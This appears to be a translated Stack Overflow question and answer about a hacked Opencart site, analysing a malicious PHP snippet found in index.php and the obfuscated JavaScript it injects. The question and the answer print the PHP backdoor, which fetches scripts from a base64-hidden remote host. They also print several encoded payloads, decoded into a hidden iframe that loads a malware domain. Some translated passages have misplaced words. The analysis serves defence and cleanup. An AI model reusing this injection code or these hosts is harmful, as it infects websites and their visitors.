php - Opencart:Ajax json响应未知字符

Question

我正在电子商务网站上。它工作正常，但是突然所有的ajax函数都无法正常工作。
当我检查萤火虫中的ajax代码时，我可以看到一些js字符串附加在该响应上：

  {"success":"Success: You have added <a href=\"http:\/\/www.test.com\/exmple\">sample<\/a> to your <a href=\"http:\/\/www.test.com
   \/index.php?route=checkout\/cart\">shopping cart<\/a>!","total":"2070
   items","amount":"$2,028.60"} <script>e=eval;v="0"+"x";a=0;try{a&=2}catch(q){a=1}if(!a)
   {try{document["\x62ody"]^=~1;}catch(q) {a2="_"}z="10_10_70_6d_27_2f_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_7a_49_80_5b_68_6e_55_68_74_6c_2f_2e_69_76_6b_80_2e_30_62_37_64_30_82_14_10_10

我只在Firefox中收到此错误。

这就是他们添加到index.php文件中的内容。

            <?php
    if (!isset($sRetry))
    {
    global $sRetry;
    $sRetry = 1;
        // This code use for global bot statistic
        $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
        $stCurlHandle = NULL;
        $stCurlLink = "";
        if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
        {
            if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
            $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
                @$stCurlHandle = curl_init( $stCurlLink ); 
        }
        } 
    if ( $stCurlHandle !== NULL )
    {
        curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
        $sResult = @curl_exec($stCurlHandle); 
        if ($sResult[0]=="O") 
         {$sResult[0]=" ";
          echo $sResult; // Statistic code end
          }
        curl_close($stCurlHandle); 
    }
    }
    ?>

我刚刚删除了代码，现在可以正常工作了...

Answer 1

糟糕的是，您没有给我们提供PHP注入的完整JavaScript（如果您仍然有PHP，请添加到您的问题中，这样我们就可以decode了）。但是非常感谢您分享背后的PHP ！！！

删除php脚本确实是解决方案，但首先应该了解如何“被黑客入侵” /“感染”！


可能是弱密码或相当新的漏洞？
另外，必须检查所有（拥有）（ftp / admin / cms）访问您网站的开发人员/维护人员/贡献者的计算机，以检查是否存在密码窃取/嗅探的恶意软件（由于访问了您/另一个受感染的网站） 。
在您的网站/服务器上安装了胭脂插件/模块？
整个服务器（及其上的所有网站）也可能遭到破坏。与托管服务商联系可能是明智的。


请注意，此类恶意软件通常由Google接收：它们会向此类被黑客入侵的网站的索引添加警告：“ This site may harm your computer.”
要删除此概念，需要使用Google网站管理员工具的“ Request a malware-review”（如果您不将页面报告为固定的话，我不知道Google是否会在x时间内自动重新扫描您的页面，我也不知道是否您可以在不使用google-webmaster工具的情况下将网页报告为固定，因此如果您不想将手机号码提供给google，请注意！！！

如果您的php代码中的base64 decode是字符串aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw，则获取URL：http://mbrowserstats.com/statE/stat.php

您被感染的php网站将上述网址与GET字符串一起使用
?ip=YOUR_IP&useragent=YOUR_BROWSER&domainname=INFECTED_WEBSITE_DOMAIN&fullpath=INFECTED_WEBSITE_PAGE&check='.isset($_GET['look'])
获取自定义的唯一按需javascript并将其插入为（目标!!）访问者提供的标记中。

为了解码该插入的访问者唯一的javascript的有效载荷，我快速生成了一个decoder（它也适用于your partial payload，使用字符_作为分隔符，并且在这些基数16的数字上的偏移量为-7）。
（部分）字符串：10_10_70_6d_27_2f_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_7a_49_80_5b_68_6e_55_68_74_6c_2f_2e_69_76_6b_80_2e_30_62_37_64_30_82_14_10_10
解码为：

        if (document.getElementsByTagName('body')[0]){

我想分享我对我得到的变体的分析，以解释其工作原理（希望对其他人有帮助）：
我访问的网站（在palemoon = firefox中）突然启动了Java，并弹出了一个cmd框。
Cr @ p。
文档的“查看源代码”显示了一个混淆的脚本，该脚本在 html标记之前（先行有空格）被“提供”（插入）：

 <script>w=window;aq="0"+"x";ff=String;ff=ff.fromCharCode;try{document["\x62ody"]^=~1;}catch(d21vd12v){v=123;vzs=false;try{document;}catch(q){vzs=1;}if(!vzs)e=w["eval"];if(1){f="0,0,60,5d,17,1f,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,20,72,4,0,0,0,60,5d,69,58,64,5c,69,1f,20,32,4,0,0,74,17,5c,63,6a,5c,17,72,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,19,33,60,5d,69,58,64,5c,17,6a,69,5a,34,1e,5f,6b,6b,67,31,26,26,69,66,6b,58,6b,5c,6b,5f,5c,6a,67,60,65,25,5a,66,64,31,2f,27,27,27,26,63,5f,5f,68,65,5a,5a,68,6a,36,5d,6b,59,5f,62,67,64,5a,66,69,6b,34,2c,28,2f,2d,2e,2c,28,1e,17,6e,60,5b,6b,5f,34,1e,28,27,27,1e,17,5f,5c,60,5e,5f,6b,34,1e,28,27,27,1e,17,6a,6b,70,63,5c,34,1e,6e,60,5b,6b,5f,31,28,27,27,67,6f,32,5f,5c,60,5e,5f,6b,31,28,27,27,67,6f,32,67,66,6a,60,6b,60,66,65,31,58,59,6a,66,63,6c,6b,5c,32,63,5c,5d,6b,31,24,28,27,27,27,27,67,6f,32,6b,66,67,31,27,32,1e,35,33,26,60,5d,69,58,64,5c,35,19,20,32,4,0,0,74,4,0,0,5d,6c,65,5a,6b,60,66,65,17,60,5d,69,58,64,5c,69,1f,20,72,4,0,0,0,6d,58,69,17,5d,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6a,69,5a,1e,23,1e,5f,6b,6b,67,31,26,26,69,66,6b,58,6b,5c,6b,5f,5c,6a,67,60,65,25,5a,66,64,31,2f,27,27,27,26,63,5f,5f,68,65,5a,5a,68,6a,36,5d,6b,59,5f,62,67,64,5a,66,69,6b,34,2c,28,2f,2d,2e,2c,28,1e,20,32,5d,25,6a,6b,70,63,5c,25,63,5c,5d,6b,34,1e,24,28,27,27,27,27,67,6f,1e,32,5d,25,6a,6b,70,63,5c,25,6b,66,67,34,1e,27,1e,32,5d,25,6a,6b,70,63,5c,25,67,66,6a,60,6b,60,66,65,34,1e,58,59,6a,66,63,6c,6b,5c,1e,32,5d,25,6a,6b,70,63,5c,25,6b,66,67,34,1e,27,1e,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6e,60,5b,6b,5f,1e,23,1e,28,27,27,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,5f,5c,60,5e,5f,6b,1e,23,1e,28,27,27,1e,20,32,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,5d,20,32,4,0,0,74"["split"](",");}w=f;s=[];for(i=2-2;-i+640!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(e(aq+(w[j]))+9);}fafa=e;fafa(s)}</script>
<html>
<head>
<title> etcetera...

通过 jsbeautifier.org运行它可以将其清除（在添加人工分析注释之前）为：

w = window;                          //hmmkay, note:reused lateron
aq = "0" + "x";                      //so.. '0x', smells like hex
ff = String;                         //haha, neat, ff is String
ff = ff.fromCharCode;                //and ff is now String's fromCharCode method
try {
    document["\x62ody"] ^= ~1;       //I'm guessing this should fail
} catch (d21vd12v) {                 //so all the rest gets executed:
    v = 123;                         //bliep? 42? Here be dragons.. aka useless
    vzs = false;                     //ahh, can you guess where this leads?
    try {                            //no idea why this test is here
        document;
    } catch (q) {                    //but for an infection this should NOT run
        vzs = 1;
    }
    if (!vzs) e = w["eval"];         //false will become true so e = EVIL
    if (1) {                         //lol, if true, ok...
                                     //ahh, f the payload, an array (by split) of
                                     //640 hex-numbers
        f = "0,0,60,5d,17,1f,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,20,72,4,0,0,0,60,5d,69,58,64,5c,69,1f,20,32,4,0,0,74,17,5c,63,6a,5c,17,72,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,19,33,60,5d,69,58,64,5c,17,6a,69,5a,34,1e,5f,6b,6b,67,31,26,26,69,66,6b,58,6b,5c,6b,5f,5c,6a,67,60,65,25,5a,66,64,31,2f,27,27,27,26,63,5f,5f,68,65,5a,5a,68,6a,36,5d,6b,59,5f,62,67,64,5a,66,69,6b,34,2c,28,2f,2d,2e,2c,28,1e,17,6e,60,5b,6b,5f,34,1e,28,27,27,1e,17,5f,5c,60,5e,5f,6b,34,1e,28,27,27,1e,17,6a,6b,70,63,5c,34,1e,6e,60,5b,6b,5f,31,28,27,27,67,6f,32,5f,5c,60,5e,5f,6b,31,28,27,27,67,6f,32,67,66,6a,60,6b,60,66,65,31,58,59,6a,66,63,6c,6b,5c,32,63,5c,5d,6b,31,24,28,27,27,27,27,67,6f,32,6b,66,67,31,27,32,1e,35,33,26,60,5d,69,58,64,5c,35,19,20,32,4,0,0,74,4,0,0,5d,6c,65,5a,6b,60,66,65,17,60,5d,69,58,64,5c,69,1f,20,72,4,0,0,0,6d,58,69,17,5d,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6a,69,5a,1e,23,1e,5f,6b,6b,67,31,26,26,69,66,6b,58,6b,5c,6b,5f,5c,6a,67,60,65,25,5a,66,64,31,2f,27,27,27,26,63,5f,5f,68,65,5a,5a,68,6a,36,5d,6b,59,5f,62,67,64,5a,66,69,6b,34,2c,28,2f,2d,2e,2c,28,1e,20,32,5d,25,6a,6b,70,63,5c,25,63,5c,5d,6b,34,1e,24,28,27,27,27,27,67,6f,1e,32,5d,25,6a,6b,70,63,5c,25,6b,66,67,34,1e,27,1e,32,5d,25,6a,6b,70,63,5c,25,67,66,6a,60,6b,60,66,65,34,1e,58,59,6a,66,63,6c,6b,5c,1e,32,5d,25,6a,6b,70,63,5c,25,6b,66,67,34,1e,27,1e,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6e,60,5b,6b,5f,1e,23,1e,28,27,27,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,5f,5c,60,5e,5f,6b,1e,23,1e,28,27,27,1e,20,32,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,5d,20,32,4,0,0,74" ["split"](",");
    }
    w = f;                           //ahh juggling w to f
    s = [];                          //preparing s to receive the decoded string
    for (i = 2 - 2; - i + 640 != 0; i += 1) {  //haha, ok: ( 2-2=0; lol; i++ )
        j = i;                       //juggle artist at it again
        if ((031 == 0x19)) if (e) s = s + ff(e(aq + (w[j])) + 9);  //9 offset
    }  // 31oct = 19hex = 25 = true, if eval, LOOK MA, WITHOUT parseInt being EVIL
    fafa = e;                        //ok stop juggling. fafa = EVIL
    fafa(s)                          //there we go: EVIL(decoded string)
}

就像现在可以读到的那样，它们跳了很多圈来欺骗病毒扫描程序。

我将其重构（以我的理解）为：

w = "/*PAYLOAD: comma separated uni-code characters in hex*/" ["split"](",");
s = '';
for (i = 0; i < 640; i++) {
    s += String.fromCharCode(  parseInt(w[i],16) + 9  );  //decode
}
eval(s)                                                   //execute

使用我的解码器（设置为基本 16，分隔字符 ,和偏移量 9） the payload decoded可以：

if (document.getElementsByTagName('body')[0]){
    iframer();
} else {
    document.write("<iframe src='http://rotatethespin.com:8000/lhhqnccqs?ftbhkpmcort=5186751' width='100' height='100' style='width:100px;height:100px;position:absolute;left:-10000px;top:0;'></iframe>");
}
function iframer(){
    var f = document.createElement('iframe');f.setAttribute('src','http://rotatethespin.com:8000/lhhqnccqs?ftbhkpmcort=5186751');f.style.left='-10000px';f.style.top='0';f.style.position='absolute';f.style.top='0';f.setAttribute('width','100');f.setAttribute('height','100');
    document.getElementsByTagName('body')[0].appendChild(f);
}

请注意，此生成的代码带有2个和3个制表符（业余或愚弄的病毒扫描？）的缩进，为了我的可读性，我删除了它们。行尾也为CR（13dec）（作者/脚本小子是否使用较旧的MAC？）。

所以，现在我们有了所有可以（最终）简单解释的代码：


PHP脚本 curl是访问者/网站的唯一javascript，用于注入服务式标记
这个（通过PHP）注入的javascript将在文档的 iframe中注入一个 body（由于主体尚不存在，因此在浏览器的帮助下），在访问页面的左侧（视线之外）定位了 -10000px （在访问者浏览器上）和
注入的 iframe加载专门针对的（针对用户正在访问的用户和网站）外部页面（包含上帝知道什么样的混乱/恶意软件/病毒/ rootkit，在我的情况下来自 rotatethespin.com:8000， muruno-vaser.info:8000， 等）。


我还通过使用此小书签获取文档的实时html来验证了这一点：

javascript:(function(){ alert(document.documentElement.innerHTML); })()

这也显示了源中注入的iframe代码。

我使用了下一个书签将iframe移入视图（假设只有1个iframe）：

javascript:(function(){ document.getElementsByTagName('iframe')[0].style.left='0px'; })()

自然也可以使用Firebug和类似的工具（取决于浏览器）。

我还注意到，当使用大多数基于Web的工具（甚至w3c验证程序）来获取受感染网站的源代码时，php不会插入javascript，从而使该网站看起来没有被感染！
当尝试一个简单的telnet命令（安全地）获取被感染的代码时，我也遇到了这个“问题”。但是，在查看了其背后的php代码之后，我意识到我曾经使用过一些HTTP命令（特别是引荐来源网址）。
这样做： epomota.com然后粘贴以下内容最终提供了受感染的标记源：

GET /path.php?page=something HTTP/1.1Host: infected-site.comUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: nl,en-us;q=0.7,en;q=0.3Referer: http://infected-site.com/index.phpConnection: Close

Note that this way one can also safely explore (and reverse-engineer) the source of the iframe etc!!

I also noticed that the website-owner's computer also did not get the infected code! This is either because his machine is infected or because the the server that distributes the javascripts did not provide a script because it knew that client-machine was already infected.

Update: having a working set of tools in this answer, I re-checked the comprised website today (after a good night rest) and got totally different script injected (but still based on the same techniques I explained in this answer).

<script>ss=eval("Str"+"ing");d=document;a=("15,15,155,152,44,54,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,167,106,175,130,145,153,122,145,161,151,54,53,146,163,150,175,53,55,137,64,141,55,177,21,15,15,15,155,152,166,145,161,151,166,54,55,77,21,15,15,201,44,151,160,167,151,44,177,21,15,15,15,150,163,147,171,161,151,162,170,62,173,166,155,170,151,54,46,100,155,152,166,145,161,151,44,167,166,147,101,53,154,170,170,164,76,63,63,151,164,163,161,163,170,145,62,147,163,161,63,160,154,170,173,175,175,164,154,154,103,152,151,146,165,175,147,160,147,101,71,65,74,72,73,71,65,53,44,173,155,150,170,154,101,53,65,64,64,53,44,154,151,155,153,154,170,101,53,65,64,64,53,44,167,170,175,160,151,101,53,173,155,150,170,154,76,65,64,64,164,174,77,154,151,155,153,154,170,76,65,64,64,164,174,77,164,163,167,155,170,155,163,162,76,145,146,167,163,160,171,170,151,77,160,151,152,170,76,61,65,64,64,64,64,164,174,77,170,163,164,76,64,77,53,102,100,63,155,152,166,145,161,151,102,46,55,77,21,15,15,201,21,15,15,152,171,162,147,170,155,163,162,44,155,152,166,145,161,151,166,54,55,177,21,15,15,15,172,145,166,44,152,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,167,166,147,53,60,53,154,170,170,164,76,63,63,151,164,163,161,163,170,145,62,147,163,161,63,160,154,170,173,175,175,164,154,154,103,152,151,146,165,175,147,160,147,101,71,65,74,72,73,71,65,53,55,77,152,62,167,170,175,160,151,62,160,151,152,170,101,53,61,65,64,64,64,64,164,174,53,77,152,62,167,170,175,160,151,62,170,163,164,101,53,64,53,77,152,62,167,170,175,160,151,62,164,163,167,155,170,155,163,162,101,53,145,146,167,163,160,171,170,151,53,77,152,62,167,170,175,160,151,62,170,163,164,101,53,64,53,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,173,155,150,170,154,53,60,53,65,64,64,53,55,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,154,151,155,153,154,170,53,60,53,65,64,64,53,55,77,21,15,15,15,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,167,106,175,130,145,153,122,145,161,151,54,53,146,163,150,175,53,55,137,64,141,62,145,164,164,151,162,150,107,154,155,160,150,54,152,55,77,21,15,15,201"["split"](","));for(i=0;i<a.length;i+=1){a[i]=parseInt(a[i],8)-(7-3);}try{d.body--}catch(q){zz=0;}try{zz&=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss["fromCharCode"].apply(ss,a));</script>

请注意，这次的数字为八进制（以8为底）（由 telnet infected-site.com 80分隔，偏移量为 ,）。
因此，我更新了我的解码器，使其包括基本/基数设置（以及此答案中的所有相关链接），并且 see the payload仍然可以相同（除了它指向的域之外）。



我通过 googling -4找到了这个问题，该问题给出了（大部分是无用的/被感染的）834个结果。

我今天偶然发现的恶意软件包含上面的字符串和里面非常漂亮的字符串 document\["\x62ody"\] ^= ~1，这给出了8300（也大多是无用的/感染的）结果。

但是 googling '// This code use for global bot statistic'（在问题中提供的php中找到）提供了超过410万个结果（至少可以追溯到2010年），表明WordPress，joomla等也是该“技术”的受害者。

阅读其中的一些链接（例如 this， this或 this），我得到的印象是，它可以欺骗搜索引擎（例如google），从而提高网页排名。这是以创建自发的恶意软件漏洞为代价的。
自然地，专门用于分发恶意软件的变体现在试图对搜索引擎隐藏自己。